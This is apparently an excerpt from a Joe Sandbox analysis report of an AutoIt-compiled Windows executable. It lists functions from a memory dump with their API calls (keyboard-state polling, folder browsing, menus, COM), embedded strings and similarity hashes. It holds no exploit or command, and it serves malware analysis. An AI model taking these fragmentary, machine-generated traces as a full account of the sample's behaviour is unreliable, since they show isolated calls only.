Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: aaf83ffd565ac704beada6329210b1ec42d4497aabd590dc98343d2719a36b05
Instruction ID: 639e62dfbe8ca902275cc19b7fcfcb5ec437aa62c01ff630e442544721d3dfe8
Opcode Fuzzy Hash: aaf83ffd565ac704beada6329210b1ec42d4497aabd590dc98343d2719a36b05
Instruction Fuzzy Hash: 17216A71214609AFE7515FA0FCCDE3A3B6EEB44385F81501AF406821A1CFB29DA0DA62

Function 0026DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00204D37: __itow.LIBCMT ref: 00204D62
Part of subcall function 00204D37: __swprintf.LIBCMT ref: 00204DAC

CoInitialize.OLE32(00000000), ref: 0026DC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0026DCC0
SHGetDesktopFolder.SHELL32(?), ref: 0026DCD4
CoCreateInstance.OLE32(00293D4C,00000000,00000001,002BB86C,?), ref: 0026DD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0026DD8F
CoTaskMemFree.OLE32(?,?), ref: 0026DDE7
_memset.LIBCMT ref: 0026DE24
SHBrowseForFolderW.SHELL32(?), ref: 0026DE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0026DE83
CoTaskMemFree.OLE32(00000000), ref: 0026DE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0026DEC1
CoUninitialize.OLE32(00000001,00000000), ref: 0026DEC3

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: f67a89325a1c104989f3de0703f3c5394b66d70059ba976f3e1670c20f8ddcb4
Instruction ID: 6979e246f0fb395e15ae919382f1ce0477184bda4d2b6c29186ca14a08687913
Opcode Fuzzy Hash: f67a89325a1c104989f3de0703f3c5394b66d70059ba976f3e1670c20f8ddcb4
Instruction Fuzzy Hash: B1B1FB75A10119AFDB04EFA4C888DAEBBF9FF48304B148459E909EB251DB31EE55CF50

Function 0026081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00260896
SetKeyboardState.USER32(?), ref: 00260901
GetAsyncKeyState.USER32(000000A0), ref: 00260921
GetKeyState.USER32(000000A0), ref: 00260938
GetAsyncKeyState.USER32(000000A1), ref: 00260967
GetKeyState.USER32(000000A1), ref: 00260978
GetAsyncKeyState.USER32(00000011), ref: 002609A4
GetKeyState.USER32(00000011), ref: 002609B2
GetAsyncKeyState.USER32(00000012), ref: 002609DB
GetKeyState.USER32(00000012), ref: 002609E9
GetAsyncKeyState.USER32(0000005B), ref: 00260A12
GetKeyState.USER32(0000005B), ref: 00260A20

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 397c9e891bf8225d7efdf9a91b264949a877200def4a25ef63f57c35123edd7b
Instruction ID: 7051d01a1ea696f353dffacebbad5616e7a2dbef8980b6c68b944a326e008ea0
Opcode Fuzzy Hash: 397c9e891bf8225d7efdf9a91b264949a877200def4a25ef63f57c35123edd7b
Instruction Fuzzy Hash: 8D51FB2091478929FB34DFB044957ABBFB49F01780F08459EC5C2571C3DA64AEECDBA1

Function 0025CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0025CE1C
GetWindowRect.USER32(00000000,?), ref: 0025CE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0025CE8C
GetDlgItem.USER32(?,00000002), ref: 0025CE97
GetWindowRect.USER32(00000000,?), ref: 0025CEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0025CEFD
GetDlgItem.USER32(?,000003E9), ref: 0025CF0B
GetWindowRect.USER32(00000000,?), ref: 0025CF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0025CF5F
GetDlgItem.USER32(?,000003EA), ref: 0025CF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0025CF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 0025CF97

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 091120ad099ced4a77c8cd56e2912ecf58edb2ca8be7b6840932abf9a0aa7940
Instruction ID: 6b3a84e51a6d04c27a120529f57348fdfaa0bf1c2a110b475119ac0bd36da41d
Opcode Fuzzy Hash: 091120ad099ced4a77c8cd56e2912ecf58edb2ca8be7b6840932abf9a0aa7940
Instruction Fuzzy Hash: 32518471B10309AFDB18CFA8DD89EAEBBBAEB88711F14812DF915D7290D7709D148B10

Function 00202581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 002029AB: GetWindowLongW.USER32(?,000000EB), ref: 002029BC

GetSysColor.USER32(0000000F), ref: 002025AF

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: f87c1e84e812ef5ef8496d11889d3308fda194e4910e3bf266bad72e33588f80
Instruction ID: 9003d187878600919fbf345779c1da578423ef5d7f84239532a2e70cf3b41af1
Opcode Fuzzy Hash: f87c1e84e812ef5ef8496d11889d3308fda194e4910e3bf266bad72e33588f80
Instruction Fuzzy Hash: 6641C431114204EFDB245F28ACCCBB93B69EB0A331F594262FD669A1E6C7318C55DF21

Function 002129BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00220B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00212A3E,?,00008000), ref: 00220BA7

Part of subcall function 00220284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00212A58,?,00008000), ref: 002202A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00212ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00212C2C

Part of subcall function 00213EBE: _wcscpy.LIBCMT ref: 00213EF6

Part of subcall function 0022386D: _iswctype.LIBCMT ref: 00223875

Strings

AU3!, xrefs: 00212A93
EA06, xrefs: 0024FD48
Bad directive syntax error, xrefs: 0025008F
Unterminated string, xrefs: 002500D6
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0024FD17
Error opening the file, xrefs: 0024FD33, 0024FDAA

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: d88f75b30f663bcb7114b33cc3fc57672e706f98a4f5bdacabf20e4f96ac8eb7
Instruction ID: b904673a45818a75242b4e84648f374078110665c8db72dabd500e038ff0de94
Opcode Fuzzy Hash: d88f75b30f663bcb7114b33cc3fc57672e706f98a4f5bdacabf20e4f96ac8eb7
Instruction Fuzzy Hash: DC029230528341DFC724EF24C981AAFBBE5AFA5354F10491DF599932A2DB30D9A9CF42

Function 00204D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00204D62
__swprintf.LIBCMT ref: 00204DAC
__i64tow.LIBCMT ref: 0023DB3B

Strings

True, xrefs: 0023DAFC
%.15g, xrefs: 00204DA6
False, xrefs: 0023DB03
0x%p, xrefs: 0023DB1D

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 83b8373961ef2cb5eb748f3a93c1385d2183b2386ba6d5668075f6e67d04aa49
Instruction ID: 178f8a53110f42439723897e64a9278ebfd3cd1b589ec69d8d807bbbea86af84
Opcode Fuzzy Hash: 83b8373961ef2cb5eb748f3a93c1385d2183b2386ba6d5668075f6e67d04aa49
Instruction Fuzzy Hash: 4041B6B153420AAFDB24EF74E941E7A73F8EB45300F20445EE649D7292EA719961CB11

Function 00287777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0028778F
CreateMenu.USER32 ref: 002877AA
SetMenu.USER32(?,00000000), ref: 002877B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00287846
IsMenu.USER32(?), ref: 0028785C
CreatePopupMenu.USER32 ref: 00287866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00287893
DrawMenuBar.USER32 ref: 0028789B

Strings

0, xrefs: 00287785
F, xrefs: 00287887

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 4cf73c7674d34e85ab3a2a314925f4672147203dc73f6a7fb364090b1ce6f12e
Instruction ID: 0f57a400c45388cb821c5f49daf421892e3ad93eef7931874f32b4c93d1a73a3
Opcode Fuzzy Hash: 4cf73c7674d34e85ab3a2a314925f4672147203dc73f6a7fb364090b1ce6f12e
Instruction Fuzzy Hash: 2F415A78A15209EFDB10EF64E888E9ABBB5FF49310F254129F945A73A0D731AD20DF50

Function 00287AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00287B83
CreateCompatibleDC.GDI32(00000000), ref: 00287B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00287B9D
SelectObject.GDI32(00000000,00000000), ref: 00287BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 00287BB0
DeleteDC.GDI32(00000000), ref: 00287BB9
GetWindowLongW.USER32(?,000000EC), ref: 00287BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00287BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00287BE3

Strings

static, xrefs: 00287B1B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 806050532fd528e1629e216e5e20c812df214d2aa98b08fa3b3b6800ac3b36ef
Instruction ID: 6e5df7cf7653300bfe8fe7175577bf51cf3c283b7c4dc1a96748e247ca9cf990
Opcode Fuzzy Hash: 806050532fd528e1629e216e5e20c812df214d2aa98b08fa3b3b6800ac3b36ef
Instruction Fuzzy Hash: 90318F36115219AFDF11AF64DC89FDB7B6AFF09324F200216FA55A21E0C731D820DBA4

Function 00227030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0022706B

Part of subcall function 00228D58: __getptd_noexit.LIBCMT ref: 00228D58

__gmtime64_s.LIBCMT ref: 00227104
__gmtime64_s.LIBCMT ref: 0022713A
__gmtime64_s.LIBCMT ref: 00227157
__allrem.LIBCMT ref: 002271AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002271C9
__allrem.LIBCMT ref: 002271E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002271FE
__allrem.LIBCMT ref: 00227215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00227233
__invoke_watson.LIBCMT ref: 002272A4

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: a5400239c3e553e9e39706b74c4344aa485108af664253309874f03aaa559618
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: 0971FD71A28727FBD714DEB9DC42B5AB3A9AF10320F14422AF914D7681E770DE648BD0

Function 00262CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00262CE9
GetMenuItemInfoW.USER32(002C7890,000000FF,00000000,00000030), ref: 00262D4A
SetMenuItemInfoW.USER32(002C7890,00000004,00000000,00000030), ref: 00262D80
Sleep.KERNEL32(000001F4), ref: 00262D92
GetMenuItemCount.USER32(?), ref: 00262DD6
GetMenuItemID.USER32(?,00000000), ref: 00262DF2
GetMenuItemID.USER32(?,-00000001), ref: 00262E1C
GetMenuItemID.USER32(?,?), ref: 00262E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00262EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00262EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00262EDC

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 71fed9867ab5a88d4ec846d5c2f1b8aa2cfddc3b80ed2acc348dc2a82a02b908
Instruction ID: aaecbe0cae4a159cbed22880414e8cad9a31b6fbe3db2cde86a9966844a25ab1
Opcode Fuzzy Hash: 71fed9867ab5a88d4ec846d5c2f1b8aa2cfddc3b80ed2acc348dc2a82a02b908
Instruction Fuzzy Hash: 4A61AE7192064AEFDB11CF64DC88EBE7BB8FB41304F14406AF841A7251D732ADA9CB61

Function 00287548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002875CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002875CD
GetWindowLongW.USER32(?,000000F0), ref: 002875F1
_memset.LIBCMT ref: 00287602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00287614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0028768C

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 91164a9e920283e48073e779507f879a1f43358c31fcf04e6099022976421171
Instruction ID: 516efa6756b0ddd041ba7961b624dd8d5b412ab7d76fba041c84eb3bc293dd49
Opcode Fuzzy Hash: 91164a9e920283e48073e779507f879a1f43358c31fcf04e6099022976421171
Instruction Fuzzy Hash: 69617B79910208AFDB10EFA4CC85EEEB7F8AB09710F240199FA15A72E1D770AD51DF60

Function 002577B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002577DD
SafeArrayAllocData.OLEAUT32(?), ref: 00257836
VariantInit.OLEAUT32(?), ref: 00257848
SafeArrayAccessData.OLEAUT32(?,?), ref: 00257868
VariantCopy.OLEAUT32(?,?), ref: 002578BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 002578CF
VariantClear.OLEAUT32(?), ref: 002578E4
SafeArrayDestroyData.OLEAUT32(?), ref: 002578F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002578FA
VariantClear.OLEAUT32(?), ref: 0025790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00257917

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: eadf193c02c17a6f31b7e89c5bcc618fe7edbb1edf232405ced769babdca2866
Instruction ID: f0a37df30d3e44160b2a31f31b89e7975957437f1b60cbd38f777ebcbe20b550
Opcode Fuzzy Hash: eadf193c02c17a6f31b7e89c5bcc618fe7edbb1edf232405ced769babdca2866
Instruction Fuzzy Hash: ED416475A1021DDFDB00DF68E88C9ADBBB9FF48311F008069E955A7261C730AA59CFA4

Function 00278AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00204D37: __itow.LIBCMT ref: 00204D62
Part of subcall function 00204D37: __swprintf.LIBCMT ref: 00204DAC

CoInitialize.OLE32 ref: 00278AED
CoUninitialize.OLE32 ref: 00278AF8
CoCreateInstance.OLE32(?,00000000,00000017,00293BBC,?), ref: 00278B58
IIDFromString.OLE32(?,?), ref: 00278BCB
VariantInit.OLEAUT32(?), ref: 00278C65
VariantClear.OLEAUT32(?), ref: 00278CC6

Strings

Invalid parameter, xrefs: 00278BE4
Failed to create object, xrefs: 00278B63, 00278C19
NULL Pointer assignment, xrefs: 00278B9D

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 9ca406803372c8a3f522f63a9d054db0a691d1510e31878df23416086e07cf8d
Instruction ID: f0c1e51c96c23c3480e0ae9848a6f4a94717b5ae0db2d93196a953c111bfebb2
Opcode Fuzzy Hash: 9ca406803372c8a3f522f63a9d054db0a691d1510e31878df23416086e07cf8d
Instruction Fuzzy Hash: F461B0702647119FD715DF14C889F5ABBE8BF44718F00884EF9899B291CB70ED58CBA6

Function 0026BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0026BB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0026BB89
GetLastError.KERNEL32 ref: 0026BB93
SetErrorMode.KERNEL32(00000000,READY), ref: 0026BC00

Strings

READY, xrefs: 0026BBD9
INVALID, xrefs: 0026BBD2
READONLY, xrefs: 0026BBCB
NOTREADY, xrefs: 0026BBBF
UNKNOWN, xrefs: 0026BBB8

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: b6835060df6e57974e60cf56e702887c3a266f2e73cc76d25062034e7e673cba
Instruction ID: 531647d4e98de1005338c425316d5b1529931706984d38a3e30dccf16142ddde
Opcode Fuzzy Hash: b6835060df6e57974e60cf56e702887c3a266f2e73cc76d25062034e7e673cba
Instruction Fuzzy Hash: 4331D435A202099FCB12EF64D889EADB7B8EF45344F108066ED05D72D5DBB099E1CB90

Function 002634DD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0026357C

Strings

blank, xrefs: 002634FE
warning, xrefs: 00263565
stop, xrefs: 0026354D
info, xrefs: 0026351D
,z,0z,, xrefs: 0026350F
question, xrefs: 00263535
,z,0z,, xrefs: 0026358D

Memory Dump Source

